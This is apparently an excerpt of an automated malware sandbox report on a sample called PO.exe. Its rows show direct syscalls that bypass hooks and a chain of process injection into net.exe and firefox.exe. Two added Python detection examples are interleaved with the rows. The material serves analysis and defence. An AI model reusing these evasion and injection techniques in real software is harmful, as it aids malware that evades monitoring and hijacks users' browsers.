                2_2_0172674D mov esi, dword ptr fs:[00000030h] (1)
                2_2_0172674D mov eax, dword ptr fs:[00000030h] (2)
                2_2_016F0750 mov eax, dword ptr fs:[00000030h] (1)
                2_2_0176C730 mov eax, dword ptr fs:[00000030h] (1)
                2_2_0172273C mov eax, dword ptr fs:[00000030h] (2)
                2_2_0172273C mov ecx, dword ptr fs:[00000030h] (1)
                2_2_0172C720 mov eax, dword ptr fs:[00000030h] (2)
                2_2_01720710 mov eax, dword ptr fs:[00000030h] (1)
                2_2_0172C700 mov eax, dword ptr fs:[00000030h] (1)
                2_2_016F0710 mov eax, dword ptr fs:[00000030h] (1)
                2_2_016F47FB mov eax, dword ptr fs:[00000030h] (2)
                2_2_0177E7E1 mov eax, dword ptr fs:[00000030h] (1)
                2_2_017127ED mov eax, dword ptr fs:[00000030h] (3)
                2_2_016FC7C0 mov eax, dword ptr fs:[00000030h] (1)
                2_2_017707C3 mov eax, dword ptr fs:[00000030h] (1)
                2_2_016F07AF mov eax, dword ptr fs:[00000030h] (1)
                2_2_017A47A0 mov eax, dword ptr fs:[00000030h] (1)
                2_2_0179678E mov eax, dword ptr fs:[00000030h] (1)
                2_2_01722674 mov eax, dword ptr fs:[00000030h] (1)
                2_2_0172A660 mov eax, dword ptr fs:[00000030h] (2)
                2_2_017B866E mov eax, dword ptr fs:[00000030h] (2)
                2_2_0170C640 mov eax, dword ptr fs:[00000030h] (1)
                2_2_016F262C mov eax, dword ptr fs:[00000030h] (1)
                2_2_01726620 mov eax, dword ptr fs:[00000030h] (1)
                2_2_01728620 mov eax, dword ptr fs:[00000030h] (1)
                2_2_0170E627 mov eax, dword ptr fs:[00000030h] (1)
                2_2_01732619 mov eax, dword ptr fs:[00000030h] (1)
                2_2_0170260B mov eax, dword ptr fs:[00000030h] (7)
                2_2_0176E609 mov eax, dword ptr fs:[00000030h] (1)
                2_2_0176E6F2 mov eax, dword ptr fs:[00000030h] (4)
                2_2_017706F1 mov eax, dword ptr fs:[00000030h] (2)
                2_2_0172A6C7 mov ebx, dword ptr fs:[00000030h] (1)
                2_2_0172A6C7 mov eax, dword ptr fs:[00000030h] (1)
                2_2_017266B0 mov eax, dword ptr fs:[00000030h] (1)
                2_2_0172C6A6 mov eax, dword ptr fs:[00000030h] (1)
                2_2_016F4690 mov eax, dword ptr fs:[00000030h] (2)
                2_2_01794978 mov eax, dword ptr fs:[00000030h] (2)
                2_2_0177C97C mov eax, dword ptr fs:[00000030h] (1)
                2_2_01716962 mov eax, dword ptr fs:[00000030h] (3)
                2_2_0173096E mov eax, dword ptr fs:[00000030h] (2)
                2_2_0173096E mov edx, dword ptr fs:[00000030h] (1)
                2_2_01770946 mov eax, dword ptr fs:[00000030h] (1)
                2_2_0178892B mov eax, dword ptr fs:[00000030h] (1)
                2_2_0177892A mov eax, dword ptr fs:[00000030h] (1)
                2_2_0177C912 mov eax, dword ptr fs:[00000030h] (1)
                2_2_016E8918 mov eax, dword ptr fs:[00000030h] (2)
                2_2_0176E908 mov eax, dword ptr fs:[00000030h] (2)
                2_2_017229F9 mov eax, dword ptr fs:[00000030h] (2)
                2_2_0177E9E0 mov eax, dword ptr fs:[00000030h] (1)
                2_2_017249D0 mov eax, dword ptr fs:[00000030h] (1)
                2_2_017BA9D3 mov eax, dword ptr fs:[00000030h] (1)
                2_2_017869C0 mov eax, dword ptr fs:[00000030h] (1)
                2_2_016FA9D0 mov eax, dword ptr fs:[00000030h] (6)
                2_2_016F09AD mov eax, dword ptr fs:[00000030h] (2)
                2_2_017789B3 mov esi, dword ptr fs:[00000030h] (1)
                2_2_017789B3 mov eax, dword ptr fs:[00000030h] (2)
                2_2_017029A0 mov eax, dword ptr fs:[00000030h] (13)
                2_2_0177E872 mov eax, dword ptr fs:[00000030h] (2)
                2_2_01786870 mov eax, dword ptr fs:[00000030h] (2)
                2_2_01720854 mov eax, dword ptr fs:[00000030h] (1)
                2_2_01702840 mov ecx, dword ptr fs:[00000030h] (1)
                2_2_016F4859 mov eax, dword ptr fs:[00000030h] (2)
                2_2_0172A830 mov eax, dword ptr fs:[00000030h] (1)
                2_2_0179483A mov eax, dword ptr fs:[00000030h] (2)
                2_2_01712835 mov eax, dword ptr fs:[00000030h] (5)
                2_2_01712835 mov ecx, dword ptr fs:[00000030h] (1)
                2_2_0177C810 mov eax, dword ptr fs:[00000030h] (1)
                2_2_0172C8F9 mov eax, dword ptr fs:[00000030h] (2)
                2_2_017BA8E4 mov eax, dword ptr fs:[00000030h] (1)
                2_2_0171E8C0 mov eax, dword ptr fs:[00000030h] (1)
                2_2_016F0887 mov eax, dword ptr fs:[00000030h] (1)
                2_2_0177C89D mov eax, dword ptr fs:[00000030h] (1)
                2_2_016ECB7E mov eax, dword ptr fs:[00000030h] (1)
                2_2_0179EB50 mov eax, dword ptr fs:[00000030h] (1)
                2_2_017A4B4B mov eax, dword ptr fs:[00000030h] (2)
                2_2_01786B40 mov eax, dword ptr fs:[00000030h] (2)
                2_2_017BAB40 mov eax, dword ptr fs:[00000030h] (1)
                2_2_01798B42 mov eax, dword ptr fs:[00000030h] (1)
                2_2_0171EB20 mov eax, dword ptr fs:[00000030h] (2)
                2_2_017B8B28 mov eax, dword ptr fs:[00000030h] (2)
                2_2_0176EB1D mov eax, dword ptr fs:[00000030h] (9)
                2_2_0177CBF0 mov eax, dword ptr fs:[00000030h] (1)
                2_2_0171EBFC mov eax, dword ptr fs:[00000030h] (1)
                2_2_016F8BF0 mov eax, dword ptr fs:[00000030h] (3)
                2_2_016F0BCD mov eax, dword ptr fs:[00000030h] (3)
                2_2_0179EBD0 mov eax, dword ptr fs:[00000030h] (1)
                2_2_01710BCB mov eax, dword ptr fs:[00000030h] (3)
                2_2_017A4BB0 mov eax, dword ptr fs:[00000030h] (2)
                2_2_01700BBE mov eax, dword ptr fs:[00000030h] (2)
                2_2_0176CA72 mov eax, dword ptr fs:[00000030h] (2)
                2_2_0179EA60 mov eax, dword ptr fs:[00000030h] (1)
                2_2_0172CA6F mov eax, dword ptr fs:[00000030h] (3)
                2_2_01700A5B mov eax, dword ptr fs:[00000030h] (2)
                2_2_016F6A50 mov eax, dword ptr fs:[00000030h] (7)
                2_2_01714A35 mov eax, dword ptr fs:[00000030h] (2)
                2_2_0172CA24 mov eax, dword ptr fs:[00000030h] (1)
                2_2_0171EA2E mov eax, dword ptr fs:[00000030h] (1)
                2_2_0177CA11 mov eax, dword ptr fs:[00000030h] (1)
                2_2_0172AAEE mov eax, dword ptr fs:[00000030h] (2)
                2_2_01724AD0 mov eax, dword ptr fs:[00000030h] (2)
                2_2_01746ACC mov eax, dword ptr fs:[00000030h] (3)
                2_2_016F0AD0 mov eax, dword ptr fs:[00000030h] (1)
                2_2_016F8AA0 mov eax, dword ptr fs:[00000030h] (2)
                2_2_01746AA4 mov eax, dword ptr fs:[00000030h] (1)
                2_2_01728A90 mov edx, dword ptr fs:[00000030h] (1)
                2_2_016FEA80 mov eax, dword ptr fs:[00000030h] (9)
                2_2_017C4A80 mov eax, dword ptr fs:[00000030h] (1)
                2_2_01788D6B mov eax, dword ptr fs:[00000030h] (1)
                2_2_016F0D59 mov eax, dword ptr fs:[00000030h] (3)
                2_2_016F8D59 mov eax, dword ptr fs:[00000030h] (5)
                Source: C:\Users\user\Desktop\PO.exe  Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtClose: Direct from: 0x76F02B6C
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtCreateKey: Direct from: 0x76F02C6C
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtSetInformationThread: Direct from: 0x76F02B4C
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtQuerySystemInformation: Direct from: 0x76F048CC
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtOpenSection: Direct from: 0x76F02E0C
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtSetInformationThread: Direct from: 0x76EF63F9
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtCreateFile: Direct from: 0x76F02FEC
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtOpenFile: Direct from: 0x76F02DCC
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtQueryInformationToken: Direct from: 0x76F02CAC
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtOpenKeyEx: Direct from: 0x76F02B9C
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtSetInformationProcess: Direct from: 0x76F02C5C
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtCreateMutant: Direct from: 0x76F035CC
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtMapViewOfSection: Direct from: 0x76F02D1C
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtResumeThread: Direct from: 0x76F036AC
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtReadFile: Direct from: 0x76F02ADC
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtDelayExecution: Direct from: 0x76F02DDC
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtQueryInformationProcess: Direct from: 0x76F02C26
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtResumeThread: Direct from: 0x76F02FBC
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe NtCreateUserProcess: Direct from: 0x76F0371C
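The "Direct from" rows above record the address each Nt* call was issued from, and the report's "Found direct / indirect Syscall" signature rests on that address not lying inside ntdll: normal user-mode code reaches the kernel only through ntdll's stubs, so a syscall issued from payload memory or from a re-mapped copy of ntdll is a hooking-bypass indicator. The following is an added example, not part of the Joe Sandbox report and not the sample's code, that reproduces this check over a subset of the report's own rows. The module map (ntdll, kernelbase and the injected executable's image range) is a constructed assumption, since the report does not list module bases, and the final NtClose row is a constructed benign control whose address falls inside the assumed ntdll range.

```python
"""Flag Nt* syscalls whose recorded origin address is not inside ntdll.

Added example, not part of the Joe Sandbox report. The syscall names and
"Direct from" addresses are transcribed from the report rows; the module map
is a constructed assumption (the report does not list module bases), and the
final NtClose row is a constructed benign control.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Module:
    name: str
    base: int
    size: int

    def contains(self, addr: int) -> bool:
        return self.base <= addr < self.base + self.size


# ASSUMPTION: an illustrative 32-bit (WOW64) layout. On a live system take the
# ranges from the process's loaded-module list instead of hard-coding them.
MODULE_MAP = [
    Module("ntdll.dll", 0x77300000, 0x1A0000),
    Module("kernelbase.dll", 0x75800000, 0x220000),
    Module("vfAu7gBmmnuGpQ5Y.exe", 0x00400000, 0x80000),
]

# Report rows (syscall, origin address), plus one constructed benign control.
SAMPLE_ROWS = """\
NtWriteVirtualMemory: Direct from: 0x76F0490C
NtAllocateVirtualMemory: Direct from: 0x76F03C9C
NtSetInformationThread: Direct from: 0x76EF63F9
NtProtectVirtualMemory: Direct from: 0x76EF7B2E
NtMapViewOfSection: Direct from: 0x76F02D1C
NtResumeThread: Direct from: 0x76F036AC
NtCreateUserProcess: Direct from: 0x76F0371C
NtClose: Direct from: 0x77312A4C
"""

ROW_RE = re.compile(r"(Nt\w+):\s*Direct from:\s*0x([0-9A-Fa-f]+)")


def parse_rows(text):
    """Extract (syscall_name, origin_address) pairs from report-style rows."""
    return [(m.group(1), int(m.group(2), 16)) for m in ROW_RE.finditer(text)]


def origin_module(addr, modules):
    """Name of the image backing addr, or 'unbacked' if no image covers it."""
    for mod in modules:
        if mod.contains(addr):
            return mod.name
    return "unbacked"


def suspicious_syscalls(rows, modules):
    """Every syscall not issued from ntdll.

    An origin in another image means a copied or re-mapped ntdll or a stub
    compiled into the payload; an unbacked origin means the stub lives in
    dynamically allocated memory. Both bypass user-mode hooks on ntdll.
    """
    flagged = []
    for name, addr in rows:
        origin = origin_module(addr, modules)
        if origin != "ntdll.dll":
            flagged.append((name, addr, origin))
    return flagged


def summarize(flagged):
    """Count flagged syscalls per origin; this is the figure worth alerting on."""
    counts = {}
    for _, _, origin in flagged:
        counts[origin] = counts.get(origin, 0) + 1
    return counts


if __name__ == "__main__":
    rows = parse_rows(SAMPLE_ROWS)
    flagged = suspicious_syscalls(rows, MODULE_MAP)
    for name, addr, origin in flagged:
        print(f"{name:28} 0x{addr:08X}  origin={origin}")
    print(summarize(flagged))
```

The check is deliberately narrow: it only tells you the caller was not ntdll. An indirect syscall that jumps to the `syscall; ret` inside ntdll's own stub passes this test, because the address the kernel sees is back in ntdll; catching that requires comparing the return address against the expected instruction after the stub's `syscall`, which needs the module bytes and is outside what the report rows carry.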
                Source: C:\Users\user\Desktop\PO.exe Memory written: C:\Users\user\Desktop\PO.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\Desktop\PO.exe Section loaded: NULL target: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe protection: execute and read and write
                Source: C:\Users\user\Desktop\PO.exe Section loaded: NULL target: C:\Windows\SysWOW64\net.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\net.exe Section loaded: NULL target: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe protection: read write
                Source: C:\Windows\SysWOW64\net.exe Section loaded: NULL target: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\net.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\net.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\net.exe Thread register set: target process: 3260
                Source: C:\Windows\SysWOW64\net.exe Thread APC queued: target process: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe
                Source: C:\Users\user\Desktop\PO.exe Process created: C:\Users\user\Desktop\PO.exe "C:\Users\user\Desktop\PO.exe"
                Source: C:\Program Files (x86)\MFyyXNJsIJBrxXBtXpEWYVyOfacuSaJmNvnqPccUNOoklODrDWfmLgCG\vfAu7gBmmnuGpQ5Y.exe Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"
                Source: C:\Windows\SysWOW64\net.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: vfAu7gBmmnuGpQ5Y.exe, 00000006.00000002.3003216471.0000000001100000.00000002.00000001.00040000.00000000.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000006.00000000.2195978107.0000000001100000.00000002.00000001.00040000.00000000.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000008.00000002.3003793880.0000000001270000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                Source: vfAu7gBmmnuGpQ5Y.exe, 00000006.00000002.3003216471.0000000001100000.00000002.00000001.00040000.00000000.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000006.00000000.2195978107.0000000001100000.00000002.00000001.00040000.00000000.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000008.00000002.3003793880.0000000001270000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                Source: vfAu7gBmmnuGpQ5Y.exe, 00000006.00000002.3003216471.0000000001100000.00000002.00000001.00040000.00000000.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000006.00000000.2195978107.0000000001100000.00000002.00000001.00040000.00000000.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000008.00000002.3003793880.0000000001270000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                Source: vfAu7gBmmnuGpQ5Y.exe, 00000006.00000002.3003216471.0000000001100000.00000002.00000001.00040000.00000000.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000006.00000000.2195978107.0000000001100000.00000002.00000001.00040000.00000000.sdmp, vfAu7gBmmnuGpQ5Y.exe, 00000008.00000002.3003793880.0000000001270000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
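Read together, the memory-written, section-loaded, thread and process-creation rows above describe an injection chain rather than isolated events: PO.exe overwrites its own image base with a PE header (the MZ bytes at 0x400000), maps execute-read-write sections into vfAu7gBmmnuGpQ5Y.exe and net.exe, and net.exe in turn maps executable sections into vfAu7gBmmnuGpQ5Y.exe and firefox.exe, queues an APC in the former and is the parent of the latter. The following is an added example, not part of the Joe Sandbox report and not the sample's code, showing how a detection pipeline would correlate such rows per (source, target) pair instead of alerting on each one. The events are transcribed from the rows above; the report gives no timestamps, so the correlation is set-based and does not depend on order, and the thread-context row is kept with its bare PID 3260 exactly as the report names it. The event kind names and the Event and TargetState types are this example's own.

```python
"""Correlate injection-related sandbox rows into per-target findings.

Added example, not from the Joe Sandbox report or from the sample. The events
are transcribed from the report's memory-written, section-loaded, thread, APC
and process-creation rows; the report has no timestamps, so correlation is
set-based per (source, target) pair. Event kind names are this example's own.
"""
from collections import defaultdict
from dataclasses import dataclass, field


@dataclass(frozen=True)
class Event:
    kind: str      # section_loaded | memory_written | thread_register_set | apc_queued | process_created
    source: str    # acting process (image name, or a bare PID where the report gives only that)
    target: str
    detail: str = ""   # page protection for section_loaded, written bytes for memory_written


@dataclass
class TargetState:
    exec_mappers: set = field(default_factory=set)      # sources that mapped executable memory in
    thread_hijackers: set = field(default_factory=set)  # sources that set a thread context
    apc_queuers: set = field(default_factory=set)       # sources that queued an APC
    parents: set = field(default_factory=set)           # sources that created this process


# Constructed from the report rows; list order follows the report, not real time.
EVENTS = [
    Event("memory_written", "PO.exe", "PO.exe", "base 0x400000 value 4D5A"),
    Event("section_loaded", "PO.exe", "vfAu7gBmmnuGpQ5Y.exe", "execute and read and write"),
    Event("section_loaded", "PO.exe", "net.exe", "execute and read and write"),
    Event("section_loaded", "net.exe", "vfAu7gBmmnuGpQ5Y.exe", "read write"),
    Event("section_loaded", "net.exe", "vfAu7gBmmnuGpQ5Y.exe", "execute and read and write"),
    Event("section_loaded", "net.exe", "firefox.exe", "read write"),
    Event("section_loaded", "net.exe", "firefox.exe", "execute and read and write"),
    Event("thread_register_set", "net.exe", "3260"),   # the report names this target only by PID
    Event("apc_queued", "net.exe", "vfAu7gBmmnuGpQ5Y.exe"),
    Event("process_created", "PO.exe", "PO.exe"),
    Event("process_created", "vfAu7gBmmnuGpQ5Y.exe", "net.exe"),
    Event("process_created", "net.exe", "firefox.exe"),
]


def correlate(events):
    """Group, per target process, which sources did what to it."""
    states = defaultdict(TargetState)
    for ev in events:
        st = states[ev.target]
        if ev.kind == "section_loaded" and "execute" in ev.detail:
            st.exec_mappers.add(ev.source)
        elif ev.kind == "thread_register_set":
            st.thread_hijackers.add(ev.source)
        elif ev.kind == "apc_queued":
            st.apc_queuers.add(ev.source)
        elif ev.kind == "process_created":
            st.parents.add(ev.source)
    return states


def detect_injection(events):
    """Return {(source, target): [steps]} for each cross-process injection pattern.

    A foreign executable mapping alone is reported. The same source also queuing
    an APC, setting a thread context, or being the target's parent escalates it
    to a full chain. A PE header written over a process's own image base is
    reported separately as self-overwrite.
    """
    findings = {}
    for target, st in correlate(events).items():
        for src in sorted(st.exec_mappers):
            if src == target:
                continue
            steps = ["executable section mapped"]
            if src in st.apc_queuers:
                steps.append("APC queued")
            if src in st.thread_hijackers:
                steps.append("thread context set")
            if src in st.parents:
                steps.append("target spawned by mapper")
            findings[(src, target)] = steps
    for ev in events:
        if ev.kind == "memory_written" and ev.source == ev.target and "4D5A" in ev.detail:
            findings[(ev.source, ev.target)] = ["PE header written at own image base"]
    return findings


def severity(steps):
    """Two or more correlated steps from one source is a confirmed chain."""
    return "high" if len(steps) >= 2 else "medium"


if __name__ == "__main__":
    for (src, dst), steps in sorted(detect_injection(EVENTS).items()):
        print(f"[{severity(steps):6}] {src} -> {dst}: {'; '.join(steps)}")
```

Because the thread-context row names its target only as PID 3260, it correlates with nothing here; a real pipeline would resolve PIDs to the process-creation events before this step, which is exactly the join the report leaves to the reader.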
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Users\user\Desktop\PO.exe VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                Source: C:\Users\user\Desktop\PO.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
